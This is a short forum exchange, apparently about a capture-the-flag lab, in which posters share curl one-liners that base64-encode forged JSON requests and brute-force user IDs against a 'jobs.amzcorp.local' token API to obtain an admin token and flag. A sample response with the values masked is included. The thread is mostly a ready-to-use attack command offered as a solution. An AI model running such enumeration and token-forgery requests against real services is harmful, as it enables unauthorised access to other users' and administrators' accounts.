October 19, 2022 at 3:50 AM [quote="joker1764" pid="667076" dateline="1665989598"][quote="hacker1111" pid="146001" dateline="1657645911"][code]for i in {950..975}; do echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64; done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code][code]Early Access Flag[/code][/quote]Why do you bruteforce uuid between values 950 and 975? How did you find that you should do this?[/quote]You should create new user then you type that command --> get flag 1echo -n '{"get_token":"True","uuid":"955","username":"admin"} ' | base64 | xargs -I {} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"{ "flag": "***", "token": "***", "username": "admin", "uuid": "955"}